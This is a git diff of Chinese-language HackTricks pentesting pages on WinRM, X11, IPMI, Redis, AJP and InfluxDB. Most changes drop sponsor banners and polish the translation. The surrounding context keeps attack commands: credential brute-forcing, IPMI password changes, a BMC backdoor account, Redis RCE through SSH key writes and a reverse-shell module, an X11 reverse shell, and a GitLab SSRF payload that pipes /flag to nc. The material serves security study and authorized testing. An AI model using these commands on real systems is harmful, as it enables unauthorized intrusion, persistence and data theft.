${function:enumeration} [-ArgumentList "arguments"] ``` @@ -104,13 +89,13 @@ Exit-PSSession # This will leave it in background if it's inside an env var (New ### **强制打开 WinRM** -要使用 PS Remoting 和 WinRM,但计算机未配置,可以通过以下方式启用它: +要使用 PS Remoting 和 WinRM,但计算机未配置,您可以通过以下方式启用它: ```powershell .\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force" ``` ### 保存和恢复会话 -如果远程计算机的**语言**受到**限制**,则此**方法**将**无效**。 +如果远程计算机的**语言**受到**限制**,则此**将无法工作**。 ```powershell #If you need to use different creds $password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force @@ -137,26 +122,11 @@ Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1 winrm quickconfig winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}' ``` -
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客洞察**\ -参与深入探讨黑客的刺激与挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -了解最新的漏洞赏金发布和重要平台更新 - -**今天就加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作! - -## 在Linux中连接WinRM +## WinRM 在 Linux 中的连接 ### 暴力破解 -请小心,暴力破解winrm可能会阻止用户。 +请小心,暴力破解 winrm 可能会阻止用户。 ```ruby #Brute force crackmapexec winrm -d -u usernames.txt -p passwords.txt @@ -291,19 +261,4 @@ Name: Hydra Brute Force Description: Need User Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP} ``` -
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客洞察**\ -参与深入探讨黑客的刺激与挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -及时了解最新的漏洞赏金发布和重要平台更新 - -**今天就加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧! - {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/6000-pentesting-x11.md b/src/network-services-pentesting/6000-pentesting-x11.md index dc9958dbc..edd87941b 100644 --- a/src/network-services-pentesting/6000-pentesting-x11.md +++ b/src/network-services-pentesting/6000-pentesting-x11.md @@ -2,21 +2,6 @@ {{#include ../banners/hacktricks-training.md}} -
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客洞察**\ -参与深入探讨黑客的刺激与挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -了解最新的漏洞赏金计划和重要平台更新 - -**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作吧! - ## 基本信息 **X Window System** (X) 是一种在基于 UNIX 的操作系统上广泛使用的多功能窗口系统。它提供了一个创建图形 **用户界面 (GUIs)** 的框架,各个程序负责用户界面的设计。这种灵活性允许在 X 环境中实现多样化和可定制的体验。 @@ -123,13 +108,13 @@ Corners: +0+0 -0+0 -0-0 +0-0 ``` msf> use exploit/unix/x11/x11_keyboard_exec ``` -**反向Shell:** Xrdp 还允许通过 Netcat 获取反向 shell。输入以下命令: +**反向Shell:** Xrdp 还允许通过 Netcat 获取反向Shell。输入以下命令: ```bash ./xrdp.py \ –no-disp ``` 在界面中,您可以看到 **R-shell 选项**。 -然后,在您的本地系统上在 5555 端口启动 **Netcat 监听器**。 +然后,在您的本地系统上端口 5555 启动 **Netcat 监听器**。 ```bash nc -lvp 5555 ``` @@ -145,19 +130,4 @@ nc -lvp 5555 - `port:6000 x11` -
- -加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客见解**\ -参与深入探讨黑客的刺激与挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -及时了解最新的漏洞赏金发布和重要平台更新 - -**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作吧! - {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/623-udp-ipmi.md b/src/network-services-pentesting/623-udp-ipmi.md index 51f58fc3d..4a4dc1db9 100644 --- a/src/network-services-pentesting/623-udp-ipmi.md +++ b/src/network-services-pentesting/623-udp-ipmi.md @@ -4,33 +4,27 @@ {{#include ../banners/hacktricks-training.md}} -
- -通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证: - -{% embed url="https://academy.8ksec.io/" %} - ## 基本信息 -### **IPMI概述** +### **IPMI 概述** -**[智能平台管理接口(IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** 提供了一种标准化的方法,用于远程管理和监控计算机系统,独立于操作系统或电源状态。该技术允许系统管理员远程管理系统,即使在系统关闭或无响应时,尤其适用于: +**[智能平台管理接口 (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** 提供了一种标准化的方法,用于远程管理和监控计算机系统,独立于操作系统或电源状态。该技术允许系统管理员远程管理系统,即使在系统关闭或无响应时,尤其适用于: - 操作系统启动前的配置 - 关机管理 - 从系统故障中恢复 -IPMI能够监控温度、电压、风扇速度和电源,同时提供库存信息、查看硬件日志,并通过SNMP发送警报。其操作所需的基本条件是电源和局域网连接。 +IPMI 能够监控温度、电压、风扇速度和电源,同时提供库存信息、查看硬件日志,并通过 SNMP 发送警报。其操作所需的基本条件是电源和 LAN 连接。 -自1998年英特尔推出以来,IPMI得到了众多厂商的支持,增强了远程管理能力,特别是2.0版本对串行局域网的支持。关键组件包括: +自 1998 年由英特尔推出以来,IPMI 得到了众多厂商的支持,增强了远程管理能力,特别是 2.0 版本对串行 LAN 的支持。关键组件包括: -- **主板管理控制器(BMC):** IPMI操作的主要微控制器。 -- **通信总线和接口:** 用于内部和外部通信,包括ICMB、IPMB以及各种本地和网络连接接口。 -- **IPMI内存:** 用于存储日志和数据。 +- **主板管理控制器 (BMC):** IPMI 操作的主要微控制器。 +- **通信总线和接口:** 用于内部和外部通信,包括 ICMB、IPMB 和各种本地及网络连接接口。 +- **IPMI 内存:** 用于存储日志和数据。 ![https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right](https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right) -**默认端口**:623/UDP/TCP(通常在UDP上,但也可能在TCP上运行) +**默认端口**:623/UDP/TCP(通常在 UDP 上,但也可能在 TCP 上运行) ## 枚举 @@ -40,7 +34,7 @@ nmap -n -p 623 10.0.0./24 nmap -n-sU -p 623 10.0.0./24 use auxiliary/scanner/ipmi/ipmi_version ``` -您可以**识别**版本,使用: +您可以**识别**版本使用: ```bash use auxiliary/scanner/ipmi/ipmi_version nmap -sU --script ipmi-version -p 623 10.10.10.10 @@ -61,7 +55,7 @@ apt-get install ipmitool # Installation command ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password ``` -### **IPMI 2.0 RAKP 认证远程密码哈希获取** +### **IPMI 2.0 RAKP 认证远程密码哈希检索** 此漏洞允许检索任何现有用户名的加盐哈希密码(MD5 和 SHA1)。要测试此漏洞,Metasploit 提供了一个模块: ```bash @@ -88,19 +82,19 @@ msf> use exploit/multi/upnp/libupnp_ssdp_overflow ``` ### 暴力破解 -**HP 在制造过程中随机化其** **集成灯光控制 (iLO)** **产品的默认密码**。这一做法与其他制造商形成对比,后者往往使用**静态默认凭据**。以下是各种产品的默认用户名和密码的总结: +**HP 在制造过程中随机生成其** **集成灯光控制 (iLO)** **产品的默认密码**。这一做法与其他制造商形成对比,后者往往使用**静态默认凭据**。以下是各种产品的默认用户名和密码的总结: -- **HP 集成灯光控制 (iLO)** 使用**工厂随机化的 8 字符串**作为其默认密码,展示了更高的安全级别。 +- **HP 集成灯光控制 (iLO)** 使用**工厂随机生成的 8 个字符的字符串**作为其默认密码,展示了更高的安全级别。 - 像**戴尔的 iDRAC、IBM 的 IMM**和**富士通的集成远程管理控制器**等产品使用易于猜测的密码,如“calvin”、“PASSW0RD”(带零)和“admin”。 -- 同样,**Supermicro IPMI (2.0)、Oracle/Sun ILOM**和**ASUS iKVM BMC**也使用简单的默认凭据,其中“ADMIN”、“changeme”和“admin”作为它们的密码。 +- 同样,**Supermicro IPMI (2.0)、Oracle/Sun ILOM**和**华硕 iKVM BMC**也使用简单的默认凭据,其中“ADMIN”、“changeme”和“admin”作为它们的密码。 ## 通过 BMC 访问主机 -对基板管理控制器 (BMC) 的管理访问打开了访问主机操作系统的各种途径。一种简单的方法是利用 BMC 的键盘、视频、鼠标 (KVM) 功能。这可以通过重启主机到根 shell 通过 GRUB(使用 `init=/bin/sh`)或从设置为救援磁盘的虚拟 CD-ROM 启动来完成。这些方法允许直接操作主机的磁盘,包括插入后门、数据提取或进行安全评估所需的任何操作。然而,这需要重启主机,这是一个显著的缺点。在不重启的情况下,访问正在运行的主机更为复杂,并且因主机的配置而异。如果主机的物理或串行控制台保持登录状态,可以通过 BMC 的 KVM 或串行通过 LAN (sol) 功能轻松接管,使用 `ipmitool`。探索共享硬件资源的利用,如 i2c 总线和超级 I/O 芯片,是一个需要进一步研究的领域。 +对基板管理控制器 (BMC) 的管理访问打开了访问主机操作系统的各种途径。一种简单的方法是利用 BMC 的键盘、视频、鼠标 (KVM) 功能。这可以通过重启主机到根 shell 通过 GRUB(使用 `init=/bin/sh`)或从设置为救援磁盘的虚拟 CD-ROM 启动来实现。这些方法允许直接操作主机的磁盘,包括插入后门、数据提取或进行安全评估所需的任何操作。然而,这需要重启主机,这是一个显著的缺点。在不重启的情况下,访问正在运行的主机更为复杂,并且因主机的配置而异。如果主机的物理或串行控制台保持登录状态,可以通过 BMC 的 KVM 或串行通过 LAN (sol) 功能轻松接管,使用 `ipmitool`。探索共享硬件资源的利用,如 i2c 总线和超级 I/O 芯片,是一个需要进一步研究的领域。 ## 从主机向 BMC 引入后门 -在攻陷一台配备 BMC 的主机后,**可以利用本地 BMC 接口插入后门用户帐户**,在服务器上创建持久存在。这一攻击需要在被攻陷的主机上存在**`ipmitool`**并激活 BMC 驱动程序支持。以下命令说明了如何使用主机的本地接口将新用户帐户注入 BMC,从而绕过身份验证的需要。这种技术适用于包括 Linux、Windows、BSD 甚至 DOS 在内的广泛操作系统。 +在攻陷一台配备 BMC 的主机后,**可以利用本地 BMC 接口插入后门用户账户**,在服务器上创建持久存在。这一攻击需要在被攻陷的主机上存在**`ipmitool`**并激活 BMC 驱动程序支持。以下命令展示了如何通过主机的本地接口将新用户账户注入 BMC,从而绕过身份验证的需要。这一技术适用于包括 Linux、Windows、BSD 甚至 DOS 在内的广泛操作系统。 ```bash ipmitool user list ID Name Callin Link Auth IPMI Msg Channel Priv Limit @@ -124,10 +118,5 @@ ID Name Callin Link Auth IPMI Msg Channel Priv Limit - [https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/) -
- -通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证: - -{% embed url="https://academy.8ksec.io/" %} {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/6379-pentesting-redis.md b/src/network-services-pentesting/6379-pentesting-redis.md index f82b4e351..f93300eda 100644 --- a/src/network-services-pentesting/6379-pentesting-redis.md +++ b/src/network-services-pentesting/6379-pentesting-redis.md @@ -2,28 +2,13 @@ {{#include ../banners/hacktricks-training.md}} -
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客洞察**\ -参与深入探讨黑客的刺激与挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -了解最新的漏洞赏金计划和重要平台更新 - -**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作! - ## 基本信息 -来自 [the docs](https://redis.io/topics/introduction):Redis 是一个开源(BSD 许可),内存中的 **数据结构存储**,用作 **数据库**、缓存和消息代理。 +来自 [the docs](https://redis.io/topics/introduction): Redis 是一个开源(BSD 许可),内存中的 **数据结构存储**,用作 **数据库**、缓存和消息代理。 -默认情况下,Redis 使用基于纯文本的协议,但您必须记住,它也可以实现 **ssl/tls**。了解如何 [运行带有 ssl/tls 的 Redis](https://fossies.org/linux/redis/TLS.md)。 +默认情况下,Redis 使用基于纯文本的协议,但您必须记住它也可以实现 **ssl/tls**。了解如何 [运行带有 ssl/tls 的 Redis 这里](https://fossies.org/linux/redis/TLS.md)。 -**默认端口:** 6379 +**默认端口:** 6379 ``` PORT STATE SERVICE VERSION 6379/tcp open redis Redis key-value store 4.0.9 @@ -88,21 +73,21 @@ rename-command FLUSHDB "" ``` 有关如何安全配置Redis服务的更多信息,请访问:[https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04) -您还可以通过命令**`monitor`**实时**监控Redis命令**的执行,或使用**`slowlog get 25`**获取**25个最慢的查询**。 +您还可以**实时监控执行的Redis命令**,使用命令**`monitor`**,或获取**25个最慢的查询**,使用**`slowlog get 25`** 在这里找到更多有趣的Redis命令信息:[https://lzone.de/cheat-sheet/Redis](https://lzone.de/cheat-sheet/Redis) ### **转储数据库** -在Redis中,**数据库是从0开始的数字**。您可以通过命令`info`的输出中的“Keyspace”部分查看是否有人在使用: +在Redis中,**数据库是从0开始的数字**。您可以在命令`info`的输出中找到是否有人在“Keyspace”块中使用: ![](<../images/image (766).png>) -或者您可以通过以下命令获取所有**键空间**(数据库): +或者您可以通过以下方式获取所有**键空间**(数据库): ``` INFO keyspace ``` -在这个例子中,**数据库 0 和 1** 正在被使用。**数据库 0 包含 4 个键,而数据库 1 包含 1 个键**。默认情况下,Redis 将使用数据库 0。为了导出例如数据库 1,您需要执行: +在这个例子中,**数据库 0 和 1** 正在被使用。**数据库 0 包含 4 个键,而数据库 1 包含 1 个**。默认情况下,Redis 将使用数据库 0。为了导出例如数据库 1,您需要执行: ```bash SELECT 1 [ ... Indicate the database ... ] @@ -127,21 +112,6 @@ DUMP ``` **使用 npm 导出数据库**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **或 python** [**redis-utils**](https://pypi.org/project/redis-utils/) -
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客洞察**\ -参与深入探讨黑客的刺激与挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -了解最新的漏洞赏金计划和重要平台更新 - -**加入我们在** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作! - ## Redis RCE ### 交互式 Shell @@ -185,15 +155,15 @@ sh.stderr.pipe(client); )()}} ``` > [!WARNING] -> 请注意,**多个模板引擎会在** **内存**中缓存模板,因此即使您覆盖它们,新的模板也**不会被执行**。在这种情况下,开发人员要么保持自动重载处于活动状态,要么您需要对服务进行DoS攻击(并期望它会自动重新启动)。 +> 请注意,**多个模板引擎会将**模板缓存到**内存**中,因此即使您覆盖它们,新的模板也**不会被执行**。在这种情况下,开发者要么保持了自动重载的状态,要么您需要对服务进行DoS攻击(并期望它会自动重新启动)。 ### SSH 示例 [来自这里](https://blog.adithyanak.com/oscp-preparation-guide/enumeration) -请注意,**`config get dir`** 的结果可能会在其他手动利用命令后更改。建议在登录Redis后立即运行它。在**`config get dir`** 的输出中,您可以找到**redis用户**的**主目录**(通常是 _/var/lib/redis_ 或 _/home/redis/.ssh_),知道这一点后,您就知道可以在哪里写入 `authenticated_users` 文件以通过ssh **以redis用户身份**访问。如果您知道其他有效用户的主目录并且您有可写权限,您也可以利用它: +请注意,**`config get dir`** 的结果在其他手动利用命令后可能会改变。建议在登录Redis后立即运行它。在**`config get dir`** 的输出中,您可以找到**redis用户**的**家目录**(通常是 _/var/lib/redis_ 或 _/home/redis/.ssh_),知道这一点后,您就知道可以在哪里写入 `authenticated_users` 文件以通过ssh **以redis用户身份**访问。如果您知道其他有效用户的家目录并且您有可写权限,您也可以利用它: -1. 在您的电脑上生成一个ssh公钥-私钥对:**`ssh-keygen -t rsa`** +1. 在您的电脑上生成一个ssh公私钥对:**`ssh-keygen -t rsa`** 2. 将公钥写入文件:**`(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt`** 3. 将文件导入redis:**`cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key`** 4. 将公钥保存到redis服务器上的**authorized_keys**文件中: @@ -232,7 +202,7 @@ OK 1. 按照 [https://github.com/n0b0dyCN/RedisModules-ExecuteCommand](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand) 的说明,您可以 **编译一个 redis 模块以执行任意命令**。 2. 然后您需要某种方式来 **上传编译好的** 模块 3. **在运行时加载上传的模块**,使用 `MODULE LOAD /path/to/mymodule.so` -4. **列出已加载的模块** 以检查是否正确加载:`MODULE LIST` +4. **列出已加载的模块** 以检查是否正确加载: `MODULE LIST` 5. **执行** **命令**: ``` @@ -243,13 +213,13 @@ OK 127.0.0.1:6379> system.rev 127.0.0.1 9999 ``` -6. 随时卸载模块:`MODULE UNLOAD mymodule` +6. 随时卸载模块: `MODULE UNLOAD mymodule` ### LUA 沙箱绕过 [**这里**](https://www.agarri.fr/blog/archives/2014/09/11/trying_to_hack_redis_via_http_requests/index.html) 您可以看到 Redis 使用命令 **EVAL** 来执行 **Lua 代码沙箱**。在链接的帖子中,您可以看到 **如何滥用它** 使用 **dofile** 函数,但 [显然](https://stackoverflow.com/questions/43502696/redis-cli-code-execution-using-eval) 这不再可能。无论如何,如果您可以 **绕过 Lua** 沙箱,您可以 **在系统上执行任意** 命令。此外,从同一帖子中,您可以看到一些 **导致 DoS 的选项**。 -一些 **CVE 以逃离 LUA**: +一些 **CVEs 用于逃离 LUA**: - [https://github.com/aodsec/CVE-2022-0543](https://github.com/aodsec/CVE-2022-0543) @@ -283,7 +253,7 @@ set mykey2 helloworld ### 示例:Gitlab SSRF + CRLF 到 Shell -在 **Gitlab11.4.7** 中发现了一个 **SSRF** 漏洞和一个 **CRLF**。该 **SSRF** 漏洞存在于 **从 URL 导入项目功能** 中,在创建新项目时允许访问以 \[0:0:0:0:0:ffff:127.0.0.1] 形式的任意 IP(这将访问 127.0.0.1),而 **CRLF** 漏洞则通过 **向 URL 添加 %0D%0A** 字符来利用。 +在 **Gitlab11.4.7** 中发现了一个 **SSRF** 漏洞和一个 **CRLF**。该 **SSRF** 漏洞存在于 **从 URL 导入项目功能** 中,在创建新项目时允许以 \[0:0:0:0:0:ffff:127.0.0.1] 的形式访问任意 IP(这将访问 127.0.0.1),而 **CRLF** 漏洞则通过 **向 URL 添加 %0D%0A** 字符来利用。 因此,可以 **利用这些漏洞与管理来自 gitlab 的队列的 Redis 实例进行通信**,并利用这些队列 **获得代码执行**。Redis 队列滥用有效载荷是: ``` @@ -296,21 +266,6 @@ exec ``` git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git ``` -_出于某种原因(根据_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _的作者所述),利用`git`方案而不是`http`方案成功。_ - -
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客洞察**\ -参与深入探讨黑客的刺激与挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -及时了解最新的漏洞赏金发布和重要平台更新 - -**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶尖黑客合作吧! +_出于某种原因(如来自_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _的作者所述),利用在`git`方案下有效,而在`http`方案下无效。_ {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/69-udp-tftp.md b/src/network-services-pentesting/69-udp-tftp.md index b93885fde..0e269f798 100644 --- a/src/network-services-pentesting/69-udp-tftp.md +++ b/src/network-services-pentesting/69-udp-tftp.md @@ -1,12 +1,8 @@ {{#include ../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} - # 基本信息 -**Trivial File Transfer Protocol (TFTP)** 是一种简单的协议,使用 **UDP 69 端口** 进行文件传输,无需身份验证。根据 **RFC 1350** 的描述,它的简单性意味着缺乏关键的安全特性,导致在公共互联网中的使用有限。然而,**TFTP** 在大型内部网络中被广泛用于向设备(如 **VoIP 电话**)分发 **配置文件** 和 **ROM 镜像**,因为它在这些特定场景中的效率很高。 +**Trivial File Transfer Protocol (TFTP)** 是一种简单的协议,使用 **UDP 端口 69**,允许在不需要身份验证的情况下进行文件传输。根据 **RFC 1350** 的描述,它的简单性意味着缺乏关键的安全特性,导致在公共互联网中的使用有限。然而,**TFTP** 在大型内部网络中被广泛用于向设备(如 **VoIP 电话**)分发 **配置文件** 和 **ROM 镜像**,因为它在这些特定场景中的效率很高。 **TODO**: 提供有关 Bittorrent-tracker 的信息(Shodan 用该名称识别此端口)。如果您有更多信息,请在 [**HackTricks telegram group**](https://t.me/peass) 中告诉我们(或在 [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) 的 GitHub 问题中)。 @@ -38,8 +34,5 @@ client.upload("filename to upload", "/local/path/file", timeout=5) - `port:69` -
- -{% embed url="https://websec.nl/" %} {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md index 88f23897e..4dced999e 100644 --- a/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md +++ b/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md @@ -2,30 +2,15 @@ {{#include ../banners/hacktricks-training.md}} -
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客洞察**\ -参与深入探讨黑客的刺激与挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -了解最新的漏洞赏金计划和重要平台更新 - -**今天就加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作! - ## 基本信息 来自 [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/) -> AJP 是一种线协议。它是 HTTP 协议的优化版本,允许独立的网络服务器如 [Apache](http://httpd.apache.org/) 与 Tomcat 通信。从历史上看,Apache 在提供静态内容方面比 Tomcat 快得多。这个想法是让 Apache 在可能的情况下提供静态内容,但将请求代理到 Tomcat 以获取与 Tomcat 相关的内容。 +> AJP 是一种线协议。它是 HTTP 协议的优化版本,允许独立的 web 服务器如 [Apache](http://httpd.apache.org/) 与 Tomcat 通信。历史上,Apache 在提供静态内容方面比 Tomcat 快得多。这个想法是让 Apache 在可能的情况下提供静态内容,但将请求代理到 Tomcat 以获取与 Tomcat 相关的内容。 还有趣的是: -> ajp13 协议是面向数据包的。出于性能原因,显然选择了二进制格式而不是更易读的纯文本。网络服务器通过 TCP 连接与 Servlet 容器通信。为了减少创建套接字的昂贵过程,网络服务器将尝试保持与 Servlet 容器的持久 TCP 连接,并重用一个连接进行多个请求/响应周期。 +> ajp13 协议是面向数据包的。出于性能原因,显然选择了二进制格式而不是更易读的纯文本。web 服务器通过 TCP 连接与 servlet 容器通信。为了减少创建套接字的昂贵过程,web 服务器将尝试保持与 servlet 容器的持久 TCP 连接,并重用一个连接进行多个请求/响应周期。 **默认端口:** 8009 ``` @@ -40,7 +25,7 @@ PORT STATE SERVICE ## 枚举 -### 自动 +### 自动化 ```bash nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 ``` @@ -54,7 +39,7 @@ nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 可以通过使用 Nginx `ajp_module` apache 模块与开放的 AJP 代理端口 (8009 TCP) 进行通信,并从该端口访问 Tomat Manager,这可能最终导致在易受攻击的服务器上实现 RCE。 -- 从 [https://nginx.org/en/download.html](https://nginx.org/en/download.html) 开始下载 Nginx,然后使用 ajp 模块编译它: +- 从 [https://nginx.org/en/download.html](https://nginx.org/en/download.html) 开始下载 Nginx,然后使用 ajp 模块进行编译: ```bash # Compile Nginx with the ajp module git clone https://github.com/dvershinin/nginx_ajp_module.git @@ -91,27 +76,12 @@ cd nginx-ajp-docker docker build . -t nginx-ajp-proxy docker run -it --rm -p 80:80 nginx-ajp-proxy ``` -### Apache AJP Proxy +### Apache AJP 代理 -也可以使用 **Apache AJP proxy** 来访问该端口,而不是 **Nginx**。 +也可以使用 **Apache AJP 代理** 来访问该端口,而不是 **Nginx**。 -## References +## 参考 - [https://github.com/yaoweibin/nginx_ajp_module](https://github.com/yaoweibin/nginx_ajp_module) -
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**Hacking Insights**\ -参与深入探讨黑客的刺激与挑战的内容 - -**Real-Time Hack News**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**Latest Announcements**\ -及时了解最新的漏洞赏金发布和重要平台更新 - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并立即与顶级黑客合作! - {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/8086-pentesting-influxdb.md b/src/network-services-pentesting/8086-pentesting-influxdb.md index f52612a6b..2f9aa1579 100644 --- a/src/network-services-pentesting/8086-pentesting-influxdb.md +++ b/src/network-services-pentesting/8086-pentesting-influxdb.md @@ -1,12 +1,5 @@ # 8086 - Pentesting InfluxDB -
- -\ -使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=8086-pentesting-influxdb) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\ -立即获取访问权限: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=8086-pentesting-influxdb" %} {{#include ../banners/hacktricks-training.md}} @@ -35,7 +28,7 @@ influx -host 'host name' -port 'port #' ``` influx –username influx –password influx_pass ``` -存在一个漏洞 influxdb,允许绕过身份验证:[**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933) +在 influxdb 中存在一个漏洞,允许绕过身份验证:[**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933) ### 手动枚举 @@ -111,11 +104,3 @@ time cpu host usage_guest usage_guest_nice usage_idle msf6 > use auxiliary/scanner/http/influxdb_enum ``` {{#include ../banners/hacktricks-training.md}} - -
- -\ -使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=8086-pentesting-influxdb) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\ -立即获取访问权限: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=8086-pentesting-influxdb" %} diff --git a/src/network-services-pentesting/9200-pentesting-elasticsearch.md b/src/network-services-pentesting/9200-pentesting-elasticsearch.md index dd7cac80c..86bbac1d8 100644 --- a/src/network-services-pentesting/9200-pentesting-elasticsearch.md +++ b/src/network-services-pentesting/9200-pentesting-elasticsearch.md @@ -2,23 +2,15 @@ {{#include ../banners/hacktricks-training.md}} -
